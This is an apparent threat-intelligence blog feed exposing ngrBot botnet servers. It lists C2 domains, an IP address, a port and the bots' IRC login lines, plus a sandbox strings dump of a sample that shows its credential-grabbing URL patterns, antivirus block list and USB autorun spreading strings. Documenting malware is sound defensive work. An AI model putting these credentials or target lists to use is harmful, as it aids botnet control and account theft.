tag:blogger.com,1999:blog-26907060053019671542012-02-02T18:25:26.197+01:00HoneypotsPighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.comBlogger18841100tag:blogger.com,1999:blog-2690706005301967154.post-70734992480313697152012-02-02T18:25:00.000+01:002012-02-02T18:25:26.203+01:00c4t3ring.info(ngrBot hosted in United States Herndon Road Runner Holdco Llc)Domains used to control bots:<br /><br />pedoapestoso.info not active <br />c4t3ring.info<br />ramen4all.info<br /><br />Resolved : [c4t3ring.info] To [74.62.152.211]<br />Resolved : [ramen4all.info] To [74.62.152.211]<br /><br />c4t3ring.info:6161 Botnet server here<br />ramen4all.info:6161 Botnet server here<br /><br />Clients: I have 247 clients and 0 servers<br />Local users: Current Local Users: 247 Max: 1261<br />Global users: Current Global Users: 247 Max: 280<br /><br />PASS p3p1n0<br />NICK n{USA|XPa}skhiyla<br />USER skhiyla 0 0 :skhiyla<br />JOIN #bugs p3p1n1<br /><br />hosting infos:<br />http://whois.domaintools.com/74.62.152.211<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2690706005301967154-7073499248031369715?l=www.exposedbotnets.com' alt='' /></div>Pighttp://www.blogger.com/profile/14894907939553492625noreply@blogger.com0tag:blogger.com,1999:blog-2690706005301967154.post-49169225289970011432012-02-01T22:18:00.002+01:002012-02-02T00:10:28.601+01:00rlz1lola.info(ngrBot hosted in Germany Hetzner Online Ag)Large ngrBot server hosted in Germany<br />Here u have strings from 2 executable samples<br /><br />30upjmrlzz.exe<br /><br /><pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%"><code>Processes:<br />PID ParentPID User Path <br />--------------------------------------------------<br />2872 1236 C:\Documents and Settings\Mes documents\30upjmrlzz.exe <br /><br />Ports:<br />Port PID Type Path <br />--------------------------------------------------<br /><br />Explorer Dlls:<br />DLL Path Company Name File Description <br />--------------------------------------------------<br />No changes Found <br /><br />IE Dlls:<br />DLL Path Company Name File Description <br />--------------------------------------------------<br />No changes Found <br /><br />Loaded Drivers:<br />Driver File Company Name Description <br />--------------------------------------------------<br /><br />Monitored RegKeys<br />Registry Key Value <br />--------------------------------------------------<br /><br />Kernel31 Api Log<br /> <br />--------------------------------------------------<br />***** Installing Hooks ***** <br />719f74df RegOpenKeyExA (HKLM\System\CurrentControlSet\Services\WinSock2\Parameters) <br />719f80c4 RegOpenKeyExA (Protocol_Catalog9) <br />719f777e RegOpenKeyExA (00000095) <br />719f764d RegOpenKeyExA (Catalog_Entries) <br />719f7cea RegOpenKeyExA (000000000001) <br />719f7cea RegOpenKeyExA (000000000002) <br />719f7cea RegOpenKeyExA (000000000003) <br />719f7cea RegOpenKeyExA (000000000004) <br />719f7cea RegOpenKeyExA (000000000005) <br />719f7cea RegOpenKeyExA (000000000006) <br />719f7cea RegOpenKeyExA (000000000007) <br />719f7cea RegOpenKeyExA (000000000008) <br />719f7cea RegOpenKeyExA (000000000009) <br />719f7cea RegOpenKeyExA (000000000010) <br />719f7cea RegOpenKeyExA (000000000011) <br />719f7cea RegOpenKeyExA (000000000012) <br />719f7cea RegOpenKeyExA (000000000013) <br />719f7cea RegOpenKeyExA (000000000014) <br />719f7cea RegOpenKeyExA (000000000015) <br />719f7cea RegOpenKeyExA (000000000016) <br />719f7cea RegOpenKeyExA (000000000017) <br />719f7cea RegOpenKeyExA (000000000018) <br />719f7cea RegOpenKeyExA (000000000019) <br />719f2623 WaitForSingleObject(77c,0) <br />719f87c6 RegOpenKeyExA (NameSpace_Catalog5) <br />719f777e RegOpenKeyExA (00000039) <br />719f835b RegOpenKeyExA (Catalog_Entries) <br />719f84ef RegOpenKeyExA (000000000001) <br />719f84ef RegOpenKeyExA (000000000002) <br />719f84ef RegOpenKeyExA (000000000003) <br />719f84ef RegOpenKeyExA (000000000004) <br />719f2623 WaitForSingleObject(774,0) <br />719e1af2 RegOpenKeyExA (HKLM\System\CurrentControlSet\Services\Winsock2\Parameters) <br />719e198e GlobalAlloc() <br />7c80b72f ExitThread() <br />7d2454bb LoadLibraryA(KERNEL32.DLL)=7c800000 <br />7d2454bb LoadLibraryA(MSVBVM60.DLL )=73370000 <br />73371c38 GetCommandLineA() <br />73372f57 CreateMutex((null)) <br />7d23eab5 WaitForSingleObject(764,7530) <br />410de8 LoadLibraryA(KERNEL32.DLL)=7c800000 <br />410de8 LoadLibraryA(MSVBVM60.DLL )=73370000 <br />733739f4 GetCommandLineA() <br />7338d1b3 LoadLibraryA(C:\WINDOWS\system32\VB6FR.DLL)=0 <br />7337452c GetVersionExA() <br />7337476c LoadLibraryA(OLEAUT32.DLL)=770e0000 <br />772370b9 GetVersionExA() <br />7723711c GetCommandLineA() <br />7337476c LoadLibraryA(SXS.DLL)=77210000 <br />774efa66 LoadLibraryA(oleaut32.dll)=770e0000 <br />73376792 RegOpenKeyA (HKLM\SOFTWARE\Microsoft\VBA\Monitors) <br />77daeff6 RegOpenKeyExA (HKLM\SOFTWARE\Microsoft\VBA\Monitors) <br />770fc957 LoadLibraryA(C:\WINDOWS\system32\kernel32.dll)=7c800000 <br />7337a15b LoadLibraryA(kernel32.dll)=7c800000 <br />406f1e LoadLibraryA(kernel32)=7c800000 <br />7337a15b LoadLibraryA(kernel32)=7c800000 <br />7337a15b LoadLibraryA(USER32)=7e390000 <br />7345d09c CreateFileA(C:\Documents and Settings\Mes documents\30upjmrlzz.exe) <br />7345d34f ReadFile() <br />406f1e LoadLibraryA(NTDLL)=7c910000 <br />7c8165b3 WaitForSingleObject(74c,64) <br />7c8191f8 LoadLibraryA(advapi32.dll)=77da0000 <br />7337a4c5 GetCurrentProcessId()=1236 <br />7337bdfa RegOpenKeyExA (HKLM\Software\Microsoft\Windows) <br />7337be1c RegOpenKeyExA (HTML Help) <br />7337be1c RegOpenKeyExA (Help) <br />7337c9ce WaitForSingleObject(7e4,ffffffff) <br />73373657 ExitProcess() <br />***** Injected Process Terminated ***** <br /><br />DirwatchData<br /> <br />--------------------------------------------------<br />WatchDir Initilized OK <br />Watching C:\DOCUME~1\LOCALS~1\Temp <br />Watching C:\WINDOWS <br />Watching C:\Program Files <br />Created: C:\WINDOWS\Prefetch\30UPJMRLZZ.EXE-2CE4436A.pf <br />Modifed: C:\WINDOWS\Prefetch\30UPJMRLZZ.EXE-2CE4436A.pf <br />Created: C:\DOCUME~1\zezak\LOCALS~1\Temp\JET501A.tmp <br />Created: C:\DOCUME~1\zezak\LOCALS~1\Temp\JET2F.tmp <br />Deteled: C:\DOCUME~1\zezak\LOCALS~1\Temp\JET2F.tmp <br />Deteled: C:\DOCUME~1\zezak\LOCALS~1\Temp\JET501A.tmp <br />File: 30upjmrlzz.exe<br />Size: 116236 Bytes<br />MD5: AB7DDF19DE425E6439160DD343B391E1<br />Packer: File not found C:\iDEFENSE\SysAnalyzer\peid.exe<br /><br />File Properties: CompanyName H3 7H<br />FileDescription <br />FileVersion 43.34.0003<br />InternalName 1<br />LegalCopyright <br />OriginalFilename <br />ProductName 4H37H<br />ProductVersion <br /><br />Exploit Signatures:<br />---------------------------------------------------------------------------<br />Scanning for 19 signatures<br />Scan Complete: 312Kb in 0,031 seconds<br />Urls<br />--------------------------------------------------<br />http://%s/%s<br />http://%s/<br />http://<br />http://api.wipmania.com/ftp://%s:%s@%s:%d<br /><br />RegKeys<br />--------------------------------------------------<br />gdatasoftware.<br />sunbeltsoftware.<br />Software\Microsoft\Windows\CurrentVersion\Run<br />Software\Microsoft\Windows\CurrentVersion\Run<br />Software\Microsoft\Windows\CurrentVersion\Policies\System<br />.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run<br /><br />ExeRefs<br />--------------------------------------------------<br />File: 30upjmrlzz_dmp.exe_<br />.exe<br />%windir%\system32\cmd.exe<br />&&%%windir%%\explorer.exe %%cd%%%s<br />%0x.exe<br />Internet Explorer\iexplore.exe<br />pidgin.exe<br />wlcomm.exe<br />msnmsgr.exe<br />msmsgs.exe<br />opera.exe<br />chrome.exe<br />ieuser.exe<br />iexplore.exe<br />firefox.exe<br />.ipconfig.exe<br />verclsid.exe<br />regedit.exe<br />rundll32.exe<br />cmd.exe<br />regsvr32.exe<br />.exe<br />lol.exe<br />winlogon.exe<br />explorer.exe<br />y%s\%s.exe<br />lsass.exe<br /><br />Raw Strings:<br />--------------------------------------------------<br />File: 30upjmrlzz_dmp.exe_<br />MD5: 20355b2f65c907536ac74b1c4cae1189<br />Size: 319490<br /><br />Ascii Strings:<br />---------------------------------------------------------------------------<br />!This program cannot be run in DOS mode.<br />Rich:<br />.text<br />`.rdata<br />@.data<br />.reloc<br />WPVS<br />t1h(<br />_[^]<br />QRPWV<br />RPQWV<br />QRPSV<br />txVhD<br />uaVhD<br />QRPSV<br />SVW3<br />u3h0<br />u!h(<br />u3h0<br />PQRV<br />RPQW<br />u:WhD<br />u#WhD<br />QRPW<br />RPQV<br />RPQV<br />PQRV<br />RPQW<br />RSSh<br />vG9u<br />t0WSV<br />WVRj<br />WSPQR<br />vt9u<br />t0WSV<br />WVRj<br />WSPQR<br />gfff<br />WVRj<br />PWQR<br />u3h0<br />u!h(<br />u3h0<br />>CAL <br />uGh4<br />=MSG t<br />=SDG <br />>MSG u`<br />SVW3<br />SVW3<br />9:vP<br />G;9r<br />@W;F<br />Wj h<br />t&j,j<br />Wjdj<br />F4VP<br />SWf9<br />t-f;<br />t=hH<br />_^[]<br />=pzC<br />|04+~4<br />_^[]<br />SVWP3<br />QWSVR<br />=lzC<br />QPRWS<br />RPQS<br />WQRV<br />_^[]<br />_^[]<br />un9F<br />t2j h<br />L9_@vI<br />;_@r<br />WVPQR<br />SQRj<br />STFU<br />=pzC<br />A8j@<br />QWRPV<br />B0QPV<br />=4yA<br />PQRj<br />PQRj<br />SVWh<br />STFU<br />Vh@P@<br />L9^8vE<br />;^8r<br />=pzC<br />hpP@<br />STFU<br />PL9^(v^<br />9+=pzC<br />+=pzC<br />+=pzC<br />+=pzC<br />+=pzC<br />+=pzC<br />;^(r<br />9~0v/<br />;~0r<br />9^8v;<br />:+=pzC<br />+=pzC<br />+=pzC<br />;^8r<br />9^@v2<br />:+=pzC<br />+=pzC<br />+=pzC<br />;^@r<br />tu9]<br />RVWPQ<br />uXWV<br />QVWRP<br />u$WP<br />E$_^[<br />tpVW<br />uTVW<br />E$_^[<br />E$^[<br />E$_^[<br />j&hx<br />t}hP<br />QVWh<br />95hVA<br />QVht<br />8POST<br />tWWV<br />PQWj<br />RPQVW<br />RPQVW<br />WVRPS<br />u h(<br />QWRS<br />SVWh<br />SVW3<br />95PWA<br />;5PWA<br />95PWA<br />;5PWA<br />VWQh4<br />t"j V<br />SVWh<br />=USERt<br />=PASS<br />:Uu#Vh<br />8Pu.<br />=FEATt<br />=TYPEt<br />=PASVu<br />=STATt<br />=LISTu<br />uuhh<br />ucWVh<br />RPQh<br />PQRh<br />QRPh<br />QVh:<br />Rh~f<br />_[^]<br />_[^]<br />F/PQ<br />~(WR<br />T0(RW<br />t=VW<br />Qh~f<br />u4SV<br />W$RP<br />tmQh<br />RSSh<br />t,PVQ<br />O,@PQ<br />TSVW3<br />WWWWh<br />F4RP<br />LSVW3<br />^<^[<br />V4QR<br />vJ9^,u<br />;F8v<br />N4PQ<br />F4RP<br />F@@PR<br />F,BRP<br />u-SSV<br />RSWWj<br />8httpu1<br />u$8H<br />QRVP<br />RVPQ<br />QRVP<br />RVPQ<br />=|[A<br />Qh~f<br />SVWP<br />=|[A<br />Rh~f<br />hh)A<br />h`)A<br />=|[A<br />tlWP<br />=|[A<br />tlWP<br />=|[A<br />Rh~f<br />=|[A<br />=|[A<br />_^[]<br />h0^A<br />hh^A<br />SVWj<br />_^Yj<br />QPPPPh<br />h(*A<br />SVWj,<br />Vj\P<br />[@^]<br />Vj.P<br />[@^]<br />QRRj<br />RRRRf<br />[_^]<br />SVWh<br />h0*A<br />*t2:<br />VhH*A<br />Qh4*A<br />QSV3<br />j PhxWA<br />h`*A<br />Vj#S<br />_^[]<br />Wj*P<br />^[_]<br />h0+A<br />h$+A<br />SVWh<br />VVVV<br />WWVS<br />SVW3<br />RVh-<br />@PVj<br />PVh-<br />VhH+A<br />SVW3<br />@PVj<br />RVj"W<br />hT+A<br />hT+A<br />h|+A<br />ht+A<br />Rhh+A<br />QhX+A<br />@PVR<br />Wj j+V<br /><%u2<br />VVVV<br />SVWh<br />QRPu<br />PQRu<br />h ,A<br />QRhL]A<br />PhT\A<br />Ph$]A<br />9Q@w<br />RRhh<br />h`]A<br />h`]A<br />h`]A<br />h`]A<br />Ph0]A<br />8nu8h<br />Rh0]A<br />Qh0]A<br />Rh0]A<br />Ph@]A<br />8nu8h<br />Rh@]A<br />Qh@]A<br />Rh@]A<br />htXA<br />h@XA<br />PVRQhT`A<br />PQRVh<br />RQPhT`A<br />PQRSh<br />8_^[<br />hPXA<br />h\XA<br />hHXA<br />Rh0]A<br />Rh0]A<br />Rh@]A<br />Qh@]A<br />h|,A<br />h|,A<br />hx,A<br />QhP_A<br />Qh|_A<br />hx,A<br />h(XA<br />hp,A<br />hd,A<br />h8XA<br />8httpuM<br />8:uE<br />u>8P<br />PhD,A<br />$_^[<br />Qh@`A<br /> _^[<br />h@,A<br />h(`A<br />h|bA<br />QRPh4,A<br />h`XA<br />h4XA<br />hXXA<br />hpXA<br />QRPh4,A<br />hhXA<br />RPQh4,A<br />SVWh<br />8#t"<br />RVWP<br />SVWR<br />hx,A<br />hx,A<br />hx]A<br />Qhl]A<br />PQh0]A<br />u(hl<br />Ph$]A<br />QRh0]A<br />SVW3<br />h -A<br />t"h<-A<br />t"h0-A<br />u5h(-A<br />Vh$cA<br />VhDcA<br />VhdcA<br />VhpcA<br />t)h0u<br />SVW3<br />RPhD-A<br />QRPh<br />QRPh<br />PQRhTaA<br />PQhDbA<br />PRh(aA<br />QRPh<br />SVW3<br />tRh|,A<br />uBPh<br />h`]A<br />h -A<br />PWQRh<br />SPQh<br />PSRhTaA<br />PhTaA<br />PRhDbA<br />Ph(aA<br />hx,A<br />tqCh<br />s[h5<br />ht.A<br />SWhl.A<br />hd.A<br />t'j j<br />h<.A<br />h46A<br />SVWh<br />hx,A<br />Rh$6A<br />h\/A<br />h\/A<br />tb@Ph<br />Rhd/A<br />;< t<br />SVW3<br />Wh00A<br />h 0A<br />5$iA<br />50iA<br />5<iA<br />5HiA<br />5TiA<br />5`iA<br />5liA<br />95$iA<br />6 iA<br />taVW<br />h@0A<br />hD0A<br />Ph<_A<br />|Sj 3<br />tlSSSSSSSSSShL0A<br />Phd0A<br />tU< u<br />u2Wh<br />h(3A<br />hT+A<br />hT+A<br />SVWh<br />hT+A<br />h,3A<br />u.h,3A<br />SVWh<br />RhP3A<br />PVQR<br />h@3A<br />;SDG <br />8SDG <br />h,3A<br />Qhx3A<br />RPhl3A<br />QRhT3A<br />t!WV<br />_^[]<br />hl.A<br />hd.A<br />hl.A<br />hd.A<br />h(mA<br />h(5A<br />t!h85A<br />_^t)<br />9|:~<br />:~+w:~<br />tK@boL@<br />L@iBK@<br />%s.%s<br />pdef<br />%s.%S<br />%s.Blocked "%s" from removing our bot file!<br />%s.Blocked "%S" from removing our bot file!<br />block<br />bdns<br />CreateFileW<br />0123456789ABCDEF<br />i.root-servers.org<br />%s.Blocked "%s" from moving our bot file<br />%s.Blocked "%S" from moving our bot file<br />%s.p10-> Message hijacked!<br />%s.p10-> Message to %s hijacked!<br />%s.p21-> Message hijacked!<br />msnmsg<br />msnint<br />baddr<br />X-MMS-IM-Format:<br />CAL %d %256s<br />msnu<br />Done frst<br />ngr->blocksize: %d<br />block_size: %d<br />NtFreeVirtualMemory<br />NtAllocateVirtualMemory<br />NtQuerySystemInformation<br />LdrEnumerateLoadedModules<br />NtQueryInformationProcess<br />LdrGetProcedureAddress<br />NtQueryVirtualMemory<br />LdrLoadDll<br />NtQueryInformationThread<br />LdrGetDllHandle<br />RtlAnsiStringToUnicodeString<br />\\.\pipe\%s<br />kernel32.dll<br />GetNativeSystemInfo<br />%s_%d<br />%s_0<br />%s-Mutex<br />SeDebugPrivilege<br />ntdll.dll<br />NtGetNextProcess<br />%s-pid<br />%s-comm<br />NtResumeThread<br />PONG <br />JOIN #<br />PRIVMSG #<br />%s.Blocked "%S" from creating "%S"<br />%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!<br />.exe<br />%s.Detected process "%S" sending an IRC packet to server %s:%d.<br />%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).<br />PRIVMSG %255s<br />JOIN %255s<br />PRIVMSG<br />JOIN<br />%s:%d<br />NtSetInformationProcess<br />%s.%s%s<br />%S%s%s<br />HKCU\<br />HKLM\<br />%s.%S%S<br />%S%S%S<br />state_%s<br />%s.%s (p='%S')<br />pop3://%s:%s@%s:%d<br />popgrab<br />%s:%s@%s:%d<br />anonymous<br />ftp://%s:%s@%s:%d<br />ftpgrab<br />%s.%s ->> %s (%s : %s)<br />%s.%s ->> %s : %s<br />Directadmin<br />WHCMS<br />cPanel<br />blog<br />%s-%s-%s<br />ffgrab<br />iegrab<br />%s.Blocked possible browser exploit pack call on URL '%s'<br />%s.Blocked possible browser exploit pack call on URL '%S'<br />webroot.<br />fortinet.<br />virusbuster.nprotect.<br />gdatasoftware.<br />virus.<br />precisesecurity.<br />lavasoft.<br />heck.tc<br />emsisoft.<br />onlinemalwarescanner.<br />onecare.live.<br />f-secure.<br />bullguard.<br />clamav.<br />pandasecurity.<br />sophos.<br />malwarebytes.<br />sunbeltsoftware.<br />norton.<br />norman.<br />mcafee.<br />symantec<br />comodo.<br />avast.<br />avira.<br />avg.<br />bitdefender.<br />eset.<br />kaspersky.<br />trendmicro.<br />iseclab.<br />virscan.<br />garyshood.<br />viruschief.<br />jotti.<br />threatexpert.<br />novirusthanks.<br />virustotal.<br />login[password]<br />login[username]<br />*members*.iknowthatgirl*/members*<br />IKnowThatGirl<br />*youporn.*/login*<br />YouPorn<br />*members.brazzers.com*<br />Brazzers<br />clave<br />numeroTarjeta<br />*clave=*<br />*bcointernacional*login*<br />Bcointernacional<br />*:2222/CMD_LOGIN*<br />*whcms*dologin*<br />*:2086/login*<br />*:2083/login*<br />*:2082/login*<br />*webnames.ru/*user_login*<br />Webnames<br />*dotster.com/*login*<br />Dotster<br />loginid<br />*enom.com/login*<br />Enom<br />login.Pass<br />login.User<br />*login.Pass=*<br />*1and1.com/xml/config*<br />1and1<br />token<br />*moniker.com/*Login*<br />Moniker<br />LoginPassword<br />LoginUserName<br />*LoginPassword=*<br />*namecheap.com/*login*<br />Namecheap<br />loginname<br />*godaddy.com/login*<br />Godaddy<br />Password<br />EmailName<br />*Password=*<br />*alertpay.com/login*<br />Alertpay<br />*netflix.com/*ogin*<br />Netflix<br />*thepiratebay.org/login*<br />Thepiratebay<br />*torrentleech.org/*login*<br />Torrentleech<br />*vip-file.com/*/signin-do*<br />Vip-file<br />*pas=*<br />*sms4file.com/*/signin-do*<br />Sms4file<br />*letitbit.net*<br />Letitbit<br />*what.cd/login*<br />Whatcd<br />*oron.com/login*<br />Oron<br />*filesonic.com/*login*<br />Filesonic<br />*speedyshare.com/login*<br />Speedyshare<br />*pw=*<br />*uploaded.to/*login*<br />Uploaded<br />*uploading.com/*login*<br />Uploading<br />loginUserPassword<br />loginUserName<br />*loginUserPassword=*<br />*fileserv.com/login*<br />Fileserve<br />*hotfile.com/login*<br />Hotfile<br />*4shared.com/login*<br />4shared<br />txtpass<br />txtuser<br />*txtpass=*<br />*netload.in/index*<br />Netload<br />*freakshare.com/login*<br />Freakshare<br />login_pass<br />*login_pass=*<br />*mediafire.com/*login*<br />Mediafire<br />*sendspace.com/login*<br />Sendspace<br />*megaupload.*/*login*<br />Megaupload<br />*depositfiles.*/*/login*<br />Depositfiles<br />userid<br />*signin.ebay*SignIn<br />eBay<br />*officebanking.cl/*login.asp*<br />OfficeBanking<br />*secure.logmein.*/*logincheck*<br />LogMeIn<br />session[password]<br />session[username_or_email]<br />*password]=*<br />*twitter.com/sessions<br />Twitter<br />txtPassword<br />txtEmail<br />*&txtPassword=*<br />*.moneybookers.*/*login.pl<br />Moneybookers<br />*runescape*/*weblogin*<br />Runescape<br />*dyndns*/account*<br />DynDNS<br />*&password=*<br />*no-ip*/login*<br />NoIP<br />*steampowered*/login*<br />Steam<br />quick_password<br />quick_username<br />username<br />*hackforums.*/member.php<br />Hackforums<br />email<br />*facebook.*/login.php*<br />Facebook<br />*login.yahoo.*/*login*<br />Yahoo<br />passwd<br />login<br />*passwd=*<br />*login.live.*/*post.srf*<br />Live<br />TextfieldPassword<br />TextfieldEmail<br />*TextfieldPassword=*<br />*gmx.*/*FormLogin*<br />*Passwd=*<br />Gmail<br />FLN-Password<br />FLN-UserName<br />*FLN-Password=*<br />*fastmail.*/mail/*<br />Fastmail<br />pass<br />user<br />*pass=*<br />*bigstring.*/*index.php*<br />BigString<br />screenname<br />*screenname.aol.*/login.psp*<br />password<br />loginId<br />*password=*<br />*aol.*/*login.psp*<br />Passwd<br />Email<br />*service=youtube*<br />*google.*/*ServiceLoginAuth*<br />YouTube<br />login_password<br />login_email<br />*login_password=*<br />*paypal.*/webscr?cmd=_login-submit*<br />PayPal<br />%s / ?%d HTTP/1.1<br />Host: %s<br />User-Agent: %s<br />Keep-Alive: 300<br />Connection: keep-alive<br />Content-Length: 42<br />POST<br />Mozilla/4.0<br />Connection: Close<br />X-a: b<br />\\.\PHYSICALDRIVE0<br />00100<br />SeShutdownPrivilege<br />NtShutdownSystem<br />This binary is invalid.<br />Main reasons:<br />- you stupid cracker<br />- you stupid cracker...<br />- you stupid cracker?!<br />ngrBot Error<br />shell32.dll<br />http<br />httpi<br />usbi<br />dnsapi.dll<br />DnsFlushResolverCache<br />http://%s/%s<br />http://%s/<br />HTTP<br />Host: <br />POST /%1023s<br />{%s|%s%s}%s<br />n%s{%s|%s%s}%s<br /><br><br />admin<br />isadmin<br />%s|%s|%s<br />[DNS]: Redirecting "%s" to "%s"<br />disabled<br />enabled<br />%s|%s<br />[Logins]: Cleared %d logins<br />#user<br />#admin<br />#new<br />removing<br />exiting<br />reconnecting<br />MOTD<br />bsod<br />disable<br />POP3 -> <br />FTP -> <br />[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)<br />dlds<br />http://<br />rebooting<br />[Login]: %s<br />[DNS]: Blocked %d domain(s) - Redirected %d domain(s)<br />[Speed]: Estimated upload speed %d KB/s<br />Software\Microsoft\Windows\CurrentVersion\Run<br />ngrBot<br />running<br />IPC_Check<br />shell\open\command=<br />shell\explore\command=<br />icon=shell32.dll,7<br />useautoplay=1<br />action=Open folder to view files<br />shellexecute=<br />[autorun]<br />.lnk<br />%windir%\system32\cmd.exe<br />&&%%windir%%\explorer.exe %%cd%%%s<br />/c "start %%cd%%RECYCLER\%s<br />RECYCLER<br />.inf<br />%s%s<br />\\.\%c:<br />%s\%s<br />%sautorun.tmp<br />%sautorun.inf<br />%c:\<br />gdkWindowToplevelClass<br />%0x.exe<br />comment-text<br />*bebo.*/c/home/ajax_post_lifestream_comment<br />bebo Lifestream<br />*bebo.*/c/profile/comment_post.json<br />bebo Comment<br />Message<br />*bebo.*/mail/MailCompose.jsp*<br />bebo Message<br />*friendster.*/sendmessage.php*<br />Friendster Message<br />comment<br />Friendster Comment<br />shoutout<br />*friendster.*/rpc.php<br />Friendster Shoutout<br />*vkontakte.ru/mail.php<br />vkontakte Message<br />*vkontakte.ru/wall.php<br />vkontakte Wall<br />message<br />*vkontakte.ru/api.php<br />vkontakte Chat<br />text<br />*twitter.*/*direct_messages/new*<br />Twitter Message<br />*twitter.*/*status*/update*<br />Twitter Tweet<br />status<br />*facebook.*/ajax/*MessageComposerEndpoint.php*<br />Facebook Message<br />msg_text<br />*facebook.*/ajax/chat/send.php*<br />Facebook IM<br />-_.!~*'()<br />Content-Length: <br />%s.%s hijacked!<br />MSG %d %s %d<br />MSG %d %1s<br />SDG %d %d<br />Reliability: <br />From: <br />Content-Length: %d<br />X-MMS-IM-Format: <br />SDG %d<br />bmsn<br />%s_0x%08X<br />RegCreateKeyExW<br />RegCreateKeyExA<br />URLDownloadToFileW<br />URLDownloadToFileA<br />PR_Write<br />DnsQuery_W<br />DnsQuery_A<br />InternetWriteFile<br />HttpSendRequestW<br />HttpSendRequestA<br />GetAddrInfoW<br />send<br />CreateFileA<br />MoveFileW<br />MoveFileA<br />DeleteFileW<br />DeleteFileA<br />CopyFileW<br />CopyFileA<br />NtQueryDirectoryFile<br />NtEnumerateValueKey<br />%08x<br />OPEN<br />DnsFree<br />DnsQuery_A<br />DNSAPI.dll<br />FreeContextBuffer<br />InitializeSecurityContextW<br />FreeCredentialsHandle<br />DeleteSecurityContext<br />QueryContextAttributesW<br />AcquireCredentialsHandleW<br />EncryptMessage<br />DecryptMessage<br />InitializeSecurityContextA<br />ApplyControlToken<br />Secur32.dll<br />SHGetSpecialFolderPathW<br />SHGetFileInfoA<br />ShellExecuteA<br />SHELL32.dll<br />InternetCloseHandle<br />InternetReadFile<br />InternetQueryDataAvailable<br />HttpQueryInfoA<br />InternetOpenUrlA<br />InternetOpenA<br />HttpQueryInfoW<br />InternetQueryOptionW<br />WININET<br />.dll<br />PathAppendW<br />StrStrIA<br />PathAppendA<br />PathFindExtensionA<br />SHLWAPI.dll<br />WS2_32.dll<br />memset<br />wcsstr<br />strstr<br />wcsrchr<br />??3@YAXPAX@Z<br />atoi<br />sscanf<br />_strcmpi<br />printf<br />_snprintf<br />sprintf<br />strncpy<br />_memicmp<br />_wcsnicmp<br />_vsnprintf<br />_stricmp<br />strtok<br />strchr<br />_snwprintf<br />??2@YAPAXI@Z<br />_strnicmp<br />isxdigit<br />memmove<br />strncmp<br />toupper<br />strrchr<br />vsprintf<br />isalnum<br />strncat<br />MSVCRT.dll<br />lstrcpyA<br />MoveFileExA<br />lstrcmpA<br />WideCharToMultiByte<br />MoveFileExW<br />lstrcmpW<br />ExitThread<br />MultiByteToWideChar<br />GetFileAttributesA<br />SetFileAttributesW<br />GetFileAttributesW<br />LoadLibraryW<br />CloseHandle<br />SetFileTime<br />CreateFileW<br />GetFileTime<br />GetSystemTimeAsFileTime<br />WriteFile<br />GetModuleHandleW<br />GetLastError<br />ReadFile<br />GetTickCount<br />HeapAlloc<br />GetProcessHeap<br />HeapFree<br />lstrlenA<br />Sleep<br />WriteProcessMemory<br />ReadProcessMemory<br />InitializeCriticalSection<br />LeaveCriticalSection<br />EnterCriticalSection<br />HeapReAlloc<br />SetEvent<br />ConnectNamedPipe<br />CreateNamedPipeA<br />CreateEventA<br />DisconnectNamedPipe<br />GetOverlappedResult<br />WaitForMultipleObjects<br />CreateFileA<br />VirtualFreeEx<br />VirtualAllocEx<br />IsWow64Process<br />CreateRemoteThread<br />OpenProcess<br />WaitForSingleObject<br />ReleaseMutex<br />MapViewOfFile<br />OpenFileMappingA<br />CreateFileMappingA<br />InterlockedIncrement<br />UnmapViewOfFile<br />CreateMutexA<br />GetVersionExA<br />GetModuleFileNameW<br />InterlockedCompareExchange<br />CreateThread<br />GetWindowsDirectoryW<br />DeleteFileW<br />GetTempFileNameW<br />lstrcatW<br />lstrcpynW<br />DeleteFileA<br />SetFileAttributesA<br />lstrcpyW<br />LocalFree<br />LocalAlloc<br />lstrcpynA<br />SetFilePointer<br />DeviceIoControl<br />VirtualAlloc<br />CreateProcessW<br />ExitProcess<br />lstrcatA<br />GetVolumeInformationW<br />GetLocaleInfoA<br />FlushFileBuffers<br />CopyFileW<br />FindClose<br />FindNextFileA<br />FindFirstFileA<br />SetCurrentDirectoryA<br />LockFile<br />GetFileSize<br />CreateDirectoryA<br />GetLogicalDriveStringsA<br />OpenMutexA<br />GetModuleFileNameA<br />GetWindowsDirectoryA<br />KERNEL32.dll<br />MessageBoxA<br />wvsprintfA<br />wsprintfW<br />DefWindowProcA<br />DispatchMessageA<br />TranslateMessage<br />GetMessageA<br />RegisterDeviceNotificationA<br />CreateWindowExA<br />RegisterClassExA<br />USER32.dll<br />CryptGetHashParam<br />CryptDestroyHash<br />CryptHashData<br />CryptReleaseContext<br />CryptCreateHash<br />CryptAcquireContextA<br />AdjustTokenPrivileges<br />LookupPrivilegeValueA<br />OpenProcessToken<br />RegCloseKey<br />RegSetValueExW<br />RegCreateKeyExW<br />RegNotifyChangeKeyValue<br />RegSetValueExA<br />RegOpenKeyExA<br />ADVAPI32.dll<br />CoCreateInstance<br />CoInitialize<br />ole32.dll<br /> n;^<br />Qkkbal<br />i]Wb<br />9a&g<br />MGiI<br />wn>Jj<br />#.zf<br />+o*7<br />!!!!!!!!<br />@@@@@@@@@@@@@@@@@@@@@@<br />@@@@@@@@@<br />@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@""""""""""""""""<br />@@@@@@<br />@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@x<br />lalorlz1.info<br />ROCKR<br />rlz1lola.info<br />ROCKR<br />rlz01jm.info<br />ROCKR<br />#ROCK<br />ngrBot<br />ELPERRO<br />]1.1.0.0<br />CUSTOMER<br />FvLQ49IlzIyLjj6m<br />msn.set<br />msn.int<br />http.set<br />http.int<br />http.inj<br />mdns<br />stats<br />speed<br />logins<br />slow<br />ssyn<br />stop<br />F4XA<br />gGWHXA<br />5hXA<br />ZpXA<br />` WA<br />f0WA<br />u{A<WA<br />[@WA<br />PASS %s<br />[.ShellClassInfo]<br />CLSID={645FF040-5081-101B-9F08-00AA002F954E}<br />USER %s 0 0 :%s<br />NICK 